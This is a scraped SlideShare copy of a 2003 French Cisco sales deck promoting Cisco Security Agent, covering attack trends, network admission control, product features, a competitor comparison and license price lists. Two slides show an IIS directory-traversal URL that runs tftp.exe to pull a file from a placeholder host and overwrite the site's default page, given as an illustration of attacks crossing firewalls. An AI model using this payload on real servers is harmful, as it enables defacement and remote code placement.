SlideShare une entreprise Scribd logo
1  sur  39
1
© 2003 Cisco Systems, Inc. All rights reserved.
Cisco Self Defending Network
Les réseaux capables de se défendre
tout seul
2
2
2
© 2003 Cisco Systems, Inc. All rights reserved.
Réseaux des années 90s
LS
FR
X.25
ATM
3
3
3
© 2003 Cisco Systems, Inc. All rights reserved.
Réseaux des années 2000
Mobilité :
• Nouvelles méthodes
d’accès au réseau :
Accès VPN
Accès Wireless
• Besoins d’ouverture
des datacenters
• Généralisation de la
messagerie
électronique
• Généralisation des
technologies Web
• Généralisation d’OS
et d’applications
cibles privilégiées
d’attaques
4
4
4
© 2003 Cisco Systems, Inc. All rights reserved.
Nouvelles contraintes…
Problème
Vers Virus
- Dégats plus graves
- Propagation plus rapide
- Patches plus fréquents
On ne peut pas tout protéger
- PC des visiteurs/interimaires
- OS/Systemes non supportés
On ne connait pas tous les clients
- Clients non managés
- De plus en plus de terminaux
non sécurisés (PDA)
Isoler les éléments nocifs
- Systemes infectés
- etc.
5
5
5
© 2003 Cisco Systems, Inc. All rights reserved.
… Nouvelles solutions !
Problème Solution
Nouvelles attaques
Protéger les machines
- Protection “Day Zero”
- Architecture sans MAJ
- Patchs automatiques
Trop d’éléments à
protéger
Créer des “ilots de sécurité” pour les éléments clé
- Protection FW et IDS (Fermes de serveurs)
- Déploiement des services réseau (résilience)
- Consolidations des Data Centers
Clients et OS inconnus
Déployer un contrôle d’admission
- Valider l’elligibilité de la machine
- Isoler/Mise en quarantine des machines
non autorisées
Isoler les systèmes
infectés
Déployer IDS/IPS partout
- Identifier les systèmes, minimiser les
dommages, contrôler la propagation
- Corellation d’événements
6
6
6
© 2003 Cisco Systems, Inc. All rights reserved.
Le Système de défense Cisco
PIX Security Appliance, IOS FW, Catalyst
6500 FWSM
Network IDS
Protection des points d’extrémité
Services réseau
Intelligent Investigation
Content Security
Security Management
Firewall
IDS Appliances, Catalyst IDS Module,
Router IDS Module, IOS-IDS
Cisco Security Agent (CSA)
Netflow, NBAR, CAR, Private Vlans, DHCP
Snooping, Dynamic ARP Inspection,
ACLs, QoS features
Cisco Threat Response (CTR)
Content Engines, Router Network
Modules
Device Managers, CiscoWorks VMS, ISC,
CiscoWorks SIMS
7
7
7
© 2003 Cisco Systems, Inc. All rights reserved.
L’approche de la sécurité doit changer !
Avant Maintenant
Produits Isolés
Produits spécialisés
Reactive
Proactive et
automatisée
Intégrée à
l’infrastructure
Intégrée aux
Systèmes d’extrémités
8
8
8
© 2003 Cisco Systems, Inc. All rights reserved.
Initiative Cisco Self-Defending Network
Durcissement
du réseau
Contrôle
de l’accès au
réseau
Protection des
systèmes
IOS CNAC
CSA
9
9
9
© 2003 Cisco Systems, Inc. All rights reserved.
Durcissement du réseau
- Renforcement des accès administrateurs
- Protection anti Déni de Service
- Buffer overflow
- Dépassement de charge CPU
- Dépassement capacité mémoire
ALARM
Durcissement
De l’IOS
2001 Today
10
10
10
© 2003 Cisco Systems, Inc. All rights reserved.
Contrôle de l’accès au réseau
Cisco Network Admission Control
Station CAMPUS
Corporate Network
1. Tentative de connexion d’un
système d’extrémité non
conforme
2. Mise en
quarantaine
3. Confinement des
infections
VLAN de Quarantaine
Cisco
Trust
Agent
Objectif : Lier la sécurité du réseau (802.1x) à
la sécurité système
11
11
11
© 2003 Cisco Systems, Inc. All rights reserved.
Phasing de CNAC
Phase 1
Q2 CY04
Phase 2
2HCY04
Equipements
réseau
Routeurs IOS
17xx – 72xx
Support de
l’agent Cisco
Trust Agent
Integration
1/3 partie
Protocoles
utilisés
Traitement des
Stations sans
réponse
Méthode de
Quarantine
Phase 3
TBD
Windows
NT, 2000, XP
Editeurs
d’Anti Virus
Layer 3
EAP/UDP
Liste d’exception,
règle unique
Layer 3 ACLs
Switches
AP Wireless
Windows 2003
Red Hat Linux
Solaris
Editeurs d’OS et de
consoles de Mgmt
Layer 2
EAP/802.1x
Politique
différenciée
VLANs, 802.1X DHCP,
Layer 3 ACLs
PACLs
Produits de Sécurité
Concentrateurs VPN
Téléphones IP
Cisco Appliances
MAC OS, HPUX, AIX
Tous types
QoS
Téléchargement
d’Applet ?
HTTP/SSL?
12
© 2003 Cisco Systems, Inc. All rights reserved.
Cisco Security Agent
Protection des systèmes (Serveurs et Desktop)
13
13
13
© 2003 Cisco Systems, Inc. All rights reserved.
Augmentation de
la complexité des
attaques
Packet Forging/
Spoofing
1990
1980
Password
Guessing
Self Replicating
Code
Password
Cracking
Exploiting Known
Vulnerabilities
Disabling
Audits
Back
Doors
Hijacking
Sessions
Sweepers
Sniffers
Stealth
Diagnostics
High
Low 2000
DDOS
Internet
Worms
Evolution des attaques
14
14
14
© 2003 Cisco Systems, Inc. All rights reserved.
mbehring
Objectif de l’attaque :
corrompre les postes internes
Router A Router B Cible
PC
Corrompus
Hacker
PC
« Innocents »
15
15
15
© 2003 Cisco Systems, Inc. All rights reserved.
Les attaques traversent les firewalls !
Firewall Serverfarms
http://XYZ/scripts/..%%35c..%%35c../winnt/system32/tftp.exe?X.Y.Z+get+default.htm+c:inetpubwwwrootdefault.htm
16
16
16
© 2003 Cisco Systems, Inc. All rights reserved.
Exemple : Code Red
17
17
17
© 2003 Cisco Systems, Inc. All rights reserved.
Déroulement d’une attaque
• Objectif de l’attaque :
Paralyser le système d’information
Frapper plus vite que la défense, plus vite que l’antivirus
Go !
Phase 1 : Localiser
- Les accès
- Les systèmes
Phase 2 : Infecter
persister
multiplier
Phase 3 : Paralyser
Bingo !
T0 T3
T1 T2
18
18
18
© 2003 Cisco Systems, Inc. All rights reserved.
Stratégie de défense antivirus
Prévention
de l’attaque
$$
Notification
et
Assurance
$
Edition
De la
Signature
$$
Scan
Et
Elimination
$$
Contrôle
Et
Eradication
$$$$
Restauration
$$$$
Information
sur la
menace
$
Prévention contre les attaques connues Réponse antivirus Restauration après infection
T1
T5 - Eradication
Totale
T5
T1 – première infection
19
19
19
© 2003 Cisco Systems, Inc. All rights reserved.
La rapidité des attaques s’accélére !
Etendue
des
dommages
Semaines
Jours
Minutes
Secondes
1980s 1990s Aujourd’hui Demain
Agir plus vite !
20
20
20
© 2003 Cisco Systems, Inc. All rights reserved.
Stratégie de Défense Cisco Security Agent
T1 T5
Cisco Security Agent
$$ $
Edition
De la
Signature
$$
Scan
Et
Elimination
$$
Contrôle
Et
Eradication
$$$$
Restauration
$$$$
$
Prévention contre les attaques connues Réponse antivirus Restauration après infection
T1 T5
Agir à T0 : aucune infection possible !
Prévention
de l’attaque
Notification
et
Assurance
Information
sur la
menace
21
© 2003 Cisco Systems, Inc. All rights reserved.
Positionnement de CSA
22
22
22
© 2003 Cisco Systems, Inc. All rights reserved.
Cisco Security Agent
Firewall Serverfarms
http://XYZ/scripts/..%%35c..%%35c../winnt/system32/tftp.exe?X.Y.Z+get+default.htm+c:inetpubwwwrootdefault.htm
Protection de l’OS
- Buffer Overflow
- Appels systèmes malveillants
Protection des fichiers systèmes
Protection des fichiers utilisateurs
Alerte de l’administrateur
Cisco Security Agent
23
23
23
© 2003 Cisco Systems, Inc. All rights reserved.
Durcissement du système
Observation comportementale
Network Protocol Stack
Host Operating System
Web
Server
Email
Client
Web
Browser
. . .
1 - Interdiction des opérations malicieuses
2 - Notification de l’usager et de l’administrateur
Network Interceptor
Contrôle d’intégrité sur
- Tout paquet entrant
- Tout paquet sortant
System Call Interceptor
Contrôle des accès :
- Au Système de fichiers
- A la base de registre
- Aux Objets COM
- Aux services HTTP
- A la mémoire
- De l’execution de code
CSA
CSA
24
24
24
© 2003 Cisco Systems, Inc. All rights reserved.
CSA Fonctions de sécurité
• Durcissement de l’OS
Protection anti Syn-flood
Détection des paquets mal formés
Contrôle de la validité des services
résidents sur la machine
• Protection des ressources système
Contrôle des accès aux fichiers
Contrôle des accès au réseau
Contrôle des accès a la base de
registre
Contrôle des accès aux composants
com
• Contrôle des .exe
Protection contre les vers (email)
Protection contre l’exécution de
fichiers téléchargés (.exe, ActiveX)
• Défense des Applications
Contrôle de l’exécution correcte du
code
Contrôle des versions de fichiers
exécutables
Protection contre l’injection de code
Protection de la gestion mémoire
Protection anti buffer overflows
(saturation de mémoire de travail de
la CPU)
Protection contre la capture de le
frappe clavier
• Surveillance de l’activité réseau
Lancement de sniffer pirate ou de
protocole non autorisé sur la
machine
Scan réseau
Capture de log systèmes
25
25
25
© 2003 Cisco Systems, Inc. All rights reserved.
Situation & Concurrence
• Système de Détection d’Intrusion (HIDS)
Détection des attaques avec remontée d’alerte
ISS et Symantec
Gartner, Network Computing: “HIDS est mort”
Pourquoi détecter seulement quand on peut protéger ?
• Firewall personnel
Filtrage applicatif
Zone Alarm (Checkpoint), Personal Firewall (Symantec)
• Systèmes de Protection d’Intrusion (HIPS)
Détection des attaques avec traitement immédiat et remontée
d’alerte
Entercept (NAI), eTrust (CA), Harris, Argus, Sana
26
26
26
© 2003 Cisco Systems, Inc. All rights reserved.
Différenciation de CSA
CSA
Firewall
Distribué
Conventionnel
Blocage des requêtes réseaux entrantes
Analyse de paquets - inspection d’état
Détection et blocage du scan de ports
Détection et blocage d’applications malicieuses
Blocage d’attaques Buffer Overflows connues
Prévention des modifications de fichiers systèmes
Vérouillage de l’Operating System
Host-based
IDS
Conventionnel
Blocage d’attaques Buffer Overflows non connues
Blocage des requêtes réseaux sortantes
Détection et blocage du DoS
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
Blocage d’attaques “Zero-day” X
X
Détection
Détection
X
27
27
27
© 2003 Cisco Systems, Inc. All rights reserved.
Différenciation de CSA
CSA Anti-Virus
Protection contre tout codes malicieux
X
Protection anti Virus / Vers connus
Protection anti Virus / Vers non connnus
Scanning et détection de fichier corrompus
Nettoyage des fichiers infectés
Identification des Virus / Vers
Pas d’update de signatures
Fonctionnalité Firewall distribué
Vérouillage de l’Operating System
Corrélation d’évènements
X
X
X
X
X
X
X
X
X
28
© 2003 Cisco Systems, Inc. All rights reserved.
Composition de l’offre
29
29
29
© 2003 Cisco Systems, Inc. All rights reserved.
Architecture Cisco Security Agent
SNMP
Traps
Custom
Programs
Local
File
• Gestion centralisée des règles et des alertes – CSA
MC
• Agents Desktops
• Agents Serveurs
Browser-based
Management GUI
Configuration
Reports, Events
VMS
E-Mail
Pagger
Agents Serveurs
CSA
Management
Center
Agents Desktop
Policy updates
30
30
30
© 2003 Cisco Systems, Inc. All rights reserved.
CSA Starter Bundle
• CiscoWorks VPN/Security Management Solution
(VMS) Basic 2.2
• CiscoWorks Management Center for Cisco Security
Agents 4.01 (CMC)
• 1 agent CSA Serveur
• 10 agents CSA Desktop
• Les ajouts de licences en supplément
31
31
31
© 2003 Cisco Systems, Inc. All rights reserved.
Agents Serveurs
• Agent Windows
Windows 2000 Server and Advanced Server
Windows NT 4.0 Server and Enterprise Server (Service
Pack 5 or later)
• Agent Solaris
Solaris 8 Service Pack ARC architecture (64-bit kernel)
32
32
32
© 2003 Cisco Systems, Inc. All rights reserved.
Agent Desktop
• Windows uniquement
Windows NT 4 Workstation (Service Pack 5 or later)
Windows 2000 Professional
Windows XP Professional
33
33
33
© 2003 Cisco Systems, Inc. All rights reserved.
CSA Management Center
Références Désignation Prix €
CSA-STARTER-K9= CSA Starter Bundle 2 700 €
CWVMS-2.2-UR-K9 VMS 2.2 WIN/SOL Unrestricted 17 996 €
CWVMS-2.2-UR-MR-K9 Minor Release update for VMS 2.X Unrestricted 896 €
34
34
34
© 2003 Cisco Systems, Inc. All rights reserved.
Prix des licences Serveurs
Références Désignation Prix €
CSA-SRVR-K9= Agent CSA Serveur (Win + Sol), 1 Agent 1 755 €
CSA-B10-SRVR-K9 Agent CSA Serveur (Win + Sol), 10 Agent Bundle 17 199 €
CSA-B25-SRVR-K9 Agent CSA Serveur (Win + Sol), 25 Agent Bundle 40 365 €
CSA-B50-SRVR-K9 Agent CSA Serveur (Win + Sol), 50 Agent Bundle 75 465 €
CSA-B100-SRVR-K9 Agent CSA Serveur (Win + Sol), 100 Agent Bundle 143 910 €
CSA-B250-SRVR-K9 Agent CSA Serveur (Win + Sol), 250 Agent Bundle 351 000 €
CSA-B500-SRVR-K9 Agent CSA Serveur (Win + Sol), 500 Agent Bundle 684 450 €
CSA-B1000-SRVR-K9 Agent CSA Serveur (Win + Sol), 1000 Agent Bundle 1 228 500 €
35
35
35
© 2003 Cisco Systems, Inc. All rights reserved.
Prix des licences Desktop
Références Désignation Prix €
CSA-B25-DTOP-K9 CSA Agent Desktop (Win + Sol), 25 Agent Bundle 1 913 €
CSA-B100-DTOP-K9 CSA Agent Desktop (Win + Sol), 100 Agent Bundle 7 421 €
CSA-B250-DTOP-K9 CSA Agent Desktop (Win + Sol), 250 Agent Bundle 17 213 €
CSA-B500-DTOP-K9 CSA Agent Desktop (Win + Sol), 500 Agent Bundle 31 748 €
CSA-B1000-DTOP-K9 CSA Agent Desktop (Win + Sol), 1000 Agent Bundle 57 375 €
CSA-B2500-DTOP-K9 CSA Agent Desktop, 2500 Agent Bundle 133 875 €
CSA-B5000-DTOP-K9 CSA Agent Desktop, 5000 Agent Bundle 240 975 €
CSA-B10000-DTOP-K9 CSA Agent Desktop, 10,000 Agent Bundle 420 750 €
36
© 2003 Cisco Systems, Inc. All rights reserved.
En résumé
37
37
37
© 2003 Cisco Systems, Inc. All rights reserved.
Productivité - Efficacité
• Défense préventive et non pas corrective
• Aucun effort d’analyse de log IDS. Aucun travail de filtrage de
log nécessaire
• Aucune mise à jour de signature nécessaire
• Facile et rapide à déployer (30 min)
• Industrialisable (10000 agents / serveur CSA MC)
• Gestion centralisée des règles de sécurité
• Gestion centralisée des alertes
• Corrélation d’alertes
38
38
38
© 2003 Cisco Systems, Inc. All rights reserved.
Politiques de sécurité paramétrables
• Exploitable sans aucun paramétrage
Fournit en standard avec un ensemble complet de règles de
sécurité couvrant 90 % des besoins de protection système
Agents pré-configurés selon certains usages types (IPTel par
exemple)
• Complètement paramétrable si besoin est
Verrouiller l’usage des applications
Définir et distribuer de nouvelles règles de sécurité
Rapidement adaptable à de nouveaux besoins applicatifs, sans
aucune mise à jour système (juste des règles)
39
39
39
© 2003 Cisco Systems, Inc. All rights reserved. 39
39
39

Contenu connexe

Similaire à CSA_Presentation_Commerciale.ppt

Traitement d’incidents de sécurité : cas pratiques, retours d’expérience et r...
Traitement d’incidents de sécurité : cas pratiques, retours d’expérience et r...Traitement d’incidents de sécurité : cas pratiques, retours d’expérience et r...
Traitement d’incidents de sécurité : cas pratiques, retours d’expérience et r...Microsoft
 
Attaques Informatiques
Attaques InformatiquesAttaques Informatiques
Attaques InformatiquesSylvain Maret
 
Starc by Exaprobe
Starc by ExaprobeStarc by Exaprobe
Starc by ExaprobeExaprobe
 
Les attaques reseaux par zellagui Amine
Les attaques reseaux par zellagui AmineLes attaques reseaux par zellagui Amine
Les attaques reseaux par zellagui AmineZellagui Amine
 
ASFWS 2011 - L’importance du protocole HTTP dans la menace APT
ASFWS 2011 - L’importance du protocole HTTP dans la menace APTASFWS 2011 - L’importance du protocole HTTP dans la menace APT
ASFWS 2011 - L’importance du protocole HTTP dans la menace APTCyber Security Alliance
 
Matinée6 solutions professionnelles de sécurité KES
Matinée6   solutions professionnelles de sécurité KESMatinée6   solutions professionnelles de sécurité KES
Matinée6 solutions professionnelles de sécurité KESALTITUDE CONCEPT SPRL
 
resume-theorique-m108-3005-6298a1255e18a.pdf
resume-theorique-m108-3005-6298a1255e18a.pdfresume-theorique-m108-3005-6298a1255e18a.pdf
resume-theorique-m108-3005-6298a1255e18a.pdfFootballLovers9
 
Sécurités & Annuaires
Sécurités & AnnuairesSécurités & Annuaires
Sécurités & AnnuairesPaulin CHOUDJA
 
Entretien et securite d'un site TYPO3
Entretien et securite d'un site TYPO3Entretien et securite d'un site TYPO3
Entretien et securite d'un site TYPO3Christian Ricard
 
Alphorm.com Formation SCADA : Cybersécurité des systèmes industriels
Alphorm.com Formation SCADA : Cybersécurité des systèmes industrielsAlphorm.com Formation SCADA : Cybersécurité des systèmes industriels
Alphorm.com Formation SCADA : Cybersécurité des systèmes industrielsAlphorm
 
Cours admin-secure-4 avril-2011
Cours admin-secure-4 avril-2011Cours admin-secure-4 avril-2011
Cours admin-secure-4 avril-2011infcom
 
Enjeux et évolutions de la sécurité informatique - Présentation Centrale Nantes
Enjeux et évolutions de la sécurité informatique - Présentation Centrale NantesEnjeux et évolutions de la sécurité informatique - Présentation Centrale Nantes
Enjeux et évolutions de la sécurité informatique - Présentation Centrale NantesMaxime ALAY-EDDINE
 
IBM Security Intelligence Juin-2016
IBM Security Intelligence Juin-2016IBM Security Intelligence Juin-2016
IBM Security Intelligence Juin-2016Serge Richard
 
Introduction à La Sécurité Informatique 1/2
Introduction à La Sécurité Informatique 1/2Introduction à La Sécurité Informatique 1/2
Introduction à La Sécurité Informatique 1/2Sylvain Maret
 
INITIATION A LA SÉCURITÉ INFORMATIQUE.pptx
INITIATION A LA SÉCURITÉ INFORMATIQUE.pptxINITIATION A LA SÉCURITÉ INFORMATIQUE.pptx
INITIATION A LA SÉCURITÉ INFORMATIQUE.pptxLeandre Cof's Yeboue
 
Kit_Commerce_Cyber_Juin2023 (1).pdf
Kit_Commerce_Cyber_Juin2023 (1).pdfKit_Commerce_Cyber_Juin2023 (1).pdf
Kit_Commerce_Cyber_Juin2023 (1).pdfEuklesSolutions
 
F-Secure Business Suite
F-Secure Business SuiteF-Secure Business Suite
F-Secure Business SuiteNRC
 

Similaire à CSA_Presentation_Commerciale.ppt (20)

Traitement d’incidents de sécurité : cas pratiques, retours d’expérience et r...
Traitement d’incidents de sécurité : cas pratiques, retours d’expérience et r...Traitement d’incidents de sécurité : cas pratiques, retours d’expérience et r...
Traitement d’incidents de sécurité : cas pratiques, retours d’expérience et r...
 
Attaques Informatiques
Attaques InformatiquesAttaques Informatiques
Attaques Informatiques
 
Sécurité des réseaux
Sécurité des réseauxSécurité des réseaux
Sécurité des réseaux
 
Starc by Exaprobe
Starc by ExaprobeStarc by Exaprobe
Starc by Exaprobe
 
Les attaques reseaux par zellagui Amine
Les attaques reseaux par zellagui AmineLes attaques reseaux par zellagui Amine
Les attaques reseaux par zellagui Amine
 
ASFWS 2011 - L’importance du protocole HTTP dans la menace APT
ASFWS 2011 - L’importance du protocole HTTP dans la menace APTASFWS 2011 - L’importance du protocole HTTP dans la menace APT
ASFWS 2011 - L’importance du protocole HTTP dans la menace APT
 
Matinée6 solutions professionnelles de sécurité KES
Matinée6   solutions professionnelles de sécurité KESMatinée6   solutions professionnelles de sécurité KES
Matinée6 solutions professionnelles de sécurité KES
 
resume-theorique-m108-3005-6298a1255e18a.pdf
resume-theorique-m108-3005-6298a1255e18a.pdfresume-theorique-m108-3005-6298a1255e18a.pdf
resume-theorique-m108-3005-6298a1255e18a.pdf
 
Sécurités & Annuaires
Sécurités & AnnuairesSécurités & Annuaires
Sécurités & Annuaires
 
Entretien et securite d'un site TYPO3
Entretien et securite d'un site TYPO3Entretien et securite d'un site TYPO3
Entretien et securite d'un site TYPO3
 
Alphorm.com Formation SCADA : Cybersécurité des systèmes industriels
Alphorm.com Formation SCADA : Cybersécurité des systèmes industrielsAlphorm.com Formation SCADA : Cybersécurité des systèmes industriels
Alphorm.com Formation SCADA : Cybersécurité des systèmes industriels
 
Cours admin-secure-4 avril-2011
Cours admin-secure-4 avril-2011Cours admin-secure-4 avril-2011
Cours admin-secure-4 avril-2011
 
Enjeux et évolutions de la sécurité informatique - Présentation Centrale Nantes
Enjeux et évolutions de la sécurité informatique - Présentation Centrale NantesEnjeux et évolutions de la sécurité informatique - Présentation Centrale Nantes
Enjeux et évolutions de la sécurité informatique - Présentation Centrale Nantes
 
IBM Security Intelligence Juin-2016
IBM Security Intelligence Juin-2016IBM Security Intelligence Juin-2016
IBM Security Intelligence Juin-2016
 
Introduction à La Sécurité Informatique 1/2
Introduction à La Sécurité Informatique 1/2Introduction à La Sécurité Informatique 1/2
Introduction à La Sécurité Informatique 1/2
 
INITIATION A LA SÉCURITÉ INFORMATIQUE.pptx
INITIATION A LA SÉCURITÉ INFORMATIQUE.pptxINITIATION A LA SÉCURITÉ INFORMATIQUE.pptx
INITIATION A LA SÉCURITÉ INFORMATIQUE.pptx
 
Chapter1.pdf
Chapter1.pdfChapter1.pdf
Chapter1.pdf
 
Kit_Commerce_Cyber_Juin2023 (1).pdf
Kit_Commerce_Cyber_Juin2023 (1).pdfKit_Commerce_Cyber_Juin2023 (1).pdf
Kit_Commerce_Cyber_Juin2023 (1).pdf
 
F-Secure Business Suite
F-Secure Business SuiteF-Secure Business Suite
F-Secure Business Suite
 
Hackfest @ WAQ2011
Hackfest @ WAQ2011Hackfest @ WAQ2011
Hackfest @ WAQ2011
 

CSA_Presentation_Commerciale.ppt

  • 1. 1 © 2003 Cisco Systems, Inc. All rights reserved. Cisco Self Defending Network Les réseaux capables de se défendre tout seul
  • 2. 2 2 2 © 2003 Cisco Systems, Inc. All rights reserved. Réseaux des années 90s LS FR X.25 ATM
  • 3. 3 3 3 © 2003 Cisco Systems, Inc. All rights reserved. Réseaux des années 2000 Mobilité : • Nouvelles méthodes d’accès au réseau : Accès VPN Accès Wireless • Besoins d’ouverture des datacenters • Généralisation de la messagerie électronique • Généralisation des technologies Web • Généralisation d’OS et d’applications cibles privilégiées d’attaques
  • 4. 4 4 4 © 2003 Cisco Systems, Inc. All rights reserved. Nouvelles contraintes… Problème Vers Virus - Dégats plus graves - Propagation plus rapide - Patches plus fréquents On ne peut pas tout protéger - PC des visiteurs/interimaires - OS/Systemes non supportés On ne connait pas tous les clients - Clients non managés - De plus en plus de terminaux non sécurisés (PDA) Isoler les éléments nocifs - Systemes infectés - etc.
  • 5. 5 5 5 © 2003 Cisco Systems, Inc. All rights reserved. … Nouvelles solutions ! Problème Solution Nouvelles attaques Protéger les machines - Protection “Day Zero” - Architecture sans MAJ - Patchs automatiques Trop d’éléments à protéger Créer des “ilots de sécurité” pour les éléments clé - Protection FW et IDS (Fermes de serveurs) - Déploiement des services réseau (résilience) - Consolidations des Data Centers Clients et OS inconnus Déployer un contrôle d’admission - Valider l’elligibilité de la machine - Isoler/Mise en quarantine des machines non autorisées Isoler les systèmes infectés Déployer IDS/IPS partout - Identifier les systèmes, minimiser les dommages, contrôler la propagation - Corellation d’événements
  • 6. 6 6 6 © 2003 Cisco Systems, Inc. All rights reserved. Le Système de défense Cisco PIX Security Appliance, IOS FW, Catalyst 6500 FWSM Network IDS Protection des points d’extrémité Services réseau Intelligent Investigation Content Security Security Management Firewall IDS Appliances, Catalyst IDS Module, Router IDS Module, IOS-IDS Cisco Security Agent (CSA) Netflow, NBAR, CAR, Private Vlans, DHCP Snooping, Dynamic ARP Inspection, ACLs, QoS features Cisco Threat Response (CTR) Content Engines, Router Network Modules Device Managers, CiscoWorks VMS, ISC, CiscoWorks SIMS
  • 7. 7 7 7 © 2003 Cisco Systems, Inc. All rights reserved. L’approche de la sécurité doit changer ! Avant Maintenant Produits Isolés Produits spécialisés Reactive Proactive et automatisée Intégrée à l’infrastructure Intégrée aux Systèmes d’extrémités
  • 8. 8 8 8 © 2003 Cisco Systems, Inc. All rights reserved. Initiative Cisco Self-Defending Network Durcissement du réseau Contrôle de l’accès au réseau Protection des systèmes IOS CNAC CSA
  • 9. 9 9 9 © 2003 Cisco Systems, Inc. All rights reserved. Durcissement du réseau - Renforcement des accès administrateurs - Protection anti Déni de Service - Buffer overflow - Dépassement de charge CPU - Dépassement capacité mémoire ALARM Durcissement De l’IOS 2001 Today
  • 10. 10 10 10 © 2003 Cisco Systems, Inc. All rights reserved. Contrôle de l’accès au réseau Cisco Network Admission Control Station CAMPUS Corporate Network 1. Tentative de connexion d’un système d’extrémité non conforme 2. Mise en quarantaine 3. Confinement des infections VLAN de Quarantaine Cisco Trust Agent Objectif : Lier la sécurité du réseau (802.1x) à la sécurité système
  • 11. 11 11 11 © 2003 Cisco Systems, Inc. All rights reserved. Phasing de CNAC Phase 1 Q2 CY04 Phase 2 2HCY04 Equipements réseau Routeurs IOS 17xx – 72xx Support de l’agent Cisco Trust Agent Integration 1/3 partie Protocoles utilisés Traitement des Stations sans réponse Méthode de Quarantine Phase 3 TBD Windows NT, 2000, XP Editeurs d’Anti Virus Layer 3 EAP/UDP Liste d’exception, règle unique Layer 3 ACLs Switches AP Wireless Windows 2003 Red Hat Linux Solaris Editeurs d’OS et de consoles de Mgmt Layer 2 EAP/802.1x Politique différenciée VLANs, 802.1X DHCP, Layer 3 ACLs PACLs Produits de Sécurité Concentrateurs VPN Téléphones IP Cisco Appliances MAC OS, HPUX, AIX Tous types QoS Téléchargement d’Applet ? HTTP/SSL?
  • 12. 12 © 2003 Cisco Systems, Inc. All rights reserved. Cisco Security Agent Protection des systèmes (Serveurs et Desktop)
  • 13. 13 13 13 © 2003 Cisco Systems, Inc. All rights reserved. Augmentation de la complexité des attaques Packet Forging/ Spoofing 1990 1980 Password Guessing Self Replicating Code Password Cracking Exploiting Known Vulnerabilities Disabling Audits Back Doors Hijacking Sessions Sweepers Sniffers Stealth Diagnostics High Low 2000 DDOS Internet Worms Evolution des attaques
  • 14. 14 14 14 © 2003 Cisco Systems, Inc. All rights reserved. mbehring Objectif de l’attaque : corrompre les postes internes Router A Router B Cible PC Corrompus Hacker PC « Innocents »
  • 15. 15 15 15 © 2003 Cisco Systems, Inc. All rights reserved. Les attaques traversent les firewalls ! Firewall Serverfarms http://XYZ/scripts/..%%35c..%%35c../winnt/system32/tftp.exe?X.Y.Z+get+default.htm+c:inetpubwwwrootdefault.htm
  • 16. 16 16 16 © 2003 Cisco Systems, Inc. All rights reserved. Exemple : Code Red
  • 17. 17 17 17 © 2003 Cisco Systems, Inc. All rights reserved. Déroulement d’une attaque • Objectif de l’attaque : Paralyser le système d’information Frapper plus vite que la défense, plus vite que l’antivirus Go ! Phase 1 : Localiser - Les accès - Les systèmes Phase 2 : Infecter persister multiplier Phase 3 : Paralyser Bingo ! T0 T3 T1 T2
  • 18. 18 18 18 © 2003 Cisco Systems, Inc. All rights reserved. Stratégie de défense antivirus Prévention de l’attaque $$ Notification et Assurance $ Edition De la Signature $$ Scan Et Elimination $$ Contrôle Et Eradication $$$$ Restauration $$$$ Information sur la menace $ Prévention contre les attaques connues Réponse antivirus Restauration après infection T1 T5 - Eradication Totale T5 T1 – première infection
  • 19. 19 19 19 © 2003 Cisco Systems, Inc. All rights reserved. La rapidité des attaques s’accélére ! Etendue des dommages Semaines Jours Minutes Secondes 1980s 1990s Aujourd’hui Demain Agir plus vite !
  • 20. 20 20 20 © 2003 Cisco Systems, Inc. All rights reserved. Stratégie de Défense Cisco Security Agent T1 T5 Cisco Security Agent $$ $ Edition De la Signature $$ Scan Et Elimination $$ Contrôle Et Eradication $$$$ Restauration $$$$ $ Prévention contre les attaques connues Réponse antivirus Restauration après infection T1 T5 Agir à T0 : aucune infection possible ! Prévention de l’attaque Notification et Assurance Information sur la menace
  • 21. 21 © 2003 Cisco Systems, Inc. All rights reserved. Positionnement de CSA
  • 22. 22 22 22 © 2003 Cisco Systems, Inc. All rights reserved. Cisco Security Agent Firewall Serverfarms http://XYZ/scripts/..%%35c..%%35c../winnt/system32/tftp.exe?X.Y.Z+get+default.htm+c:inetpubwwwrootdefault.htm Protection de l’OS - Buffer Overflow - Appels systèmes malveillants Protection des fichiers systèmes Protection des fichiers utilisateurs Alerte de l’administrateur Cisco Security Agent
  • 23. 23 23 23 © 2003 Cisco Systems, Inc. All rights reserved. Durcissement du système Observation comportementale Network Protocol Stack Host Operating System Web Server Email Client Web Browser . . . 1 - Interdiction des opérations malicieuses 2 - Notification de l’usager et de l’administrateur Network Interceptor Contrôle d’intégrité sur - Tout paquet entrant - Tout paquet sortant System Call Interceptor Contrôle des accès : - Au Système de fichiers - A la base de registre - Aux Objets COM - Aux services HTTP - A la mémoire - De l’execution de code CSA CSA
  • 24. 24 24 24 © 2003 Cisco Systems, Inc. All rights reserved. CSA Fonctions de sécurité • Durcissement de l’OS Protection anti Syn-flood Détection des paquets mal formés Contrôle de la validité des services résidents sur la machine • Protection des ressources système Contrôle des accès aux fichiers Contrôle des accès au réseau Contrôle des accès a la base de registre Contrôle des accès aux composants com • Contrôle des .exe Protection contre les vers (email) Protection contre l’exécution de fichiers téléchargés (.exe, ActiveX) • Défense des Applications Contrôle de l’exécution correcte du code Contrôle des versions de fichiers exécutables Protection contre l’injection de code Protection de la gestion mémoire Protection anti buffer overflows (saturation de mémoire de travail de la CPU) Protection contre la capture de le frappe clavier • Surveillance de l’activité réseau Lancement de sniffer pirate ou de protocole non autorisé sur la machine Scan réseau Capture de log systèmes
  • 25. 25 25 25 © 2003 Cisco Systems, Inc. All rights reserved. Situation & Concurrence • Système de Détection d’Intrusion (HIDS) Détection des attaques avec remontée d’alerte ISS et Symantec Gartner, Network Computing: “HIDS est mort” Pourquoi détecter seulement quand on peut protéger ? • Firewall personnel Filtrage applicatif Zone Alarm (Checkpoint), Personal Firewall (Symantec) • Systèmes de Protection d’Intrusion (HIPS) Détection des attaques avec traitement immédiat et remontée d’alerte Entercept (NAI), eTrust (CA), Harris, Argus, Sana
  • 26. 26 26 26 © 2003 Cisco Systems, Inc. All rights reserved. Différenciation de CSA CSA Firewall Distribué Conventionnel Blocage des requêtes réseaux entrantes Analyse de paquets - inspection d’état Détection et blocage du scan de ports Détection et blocage d’applications malicieuses Blocage d’attaques Buffer Overflows connues Prévention des modifications de fichiers systèmes Vérouillage de l’Operating System Host-based IDS Conventionnel Blocage d’attaques Buffer Overflows non connues Blocage des requêtes réseaux sortantes Détection et blocage du DoS X X X X X X X X X X X X X X X Blocage d’attaques “Zero-day” X X Détection Détection X
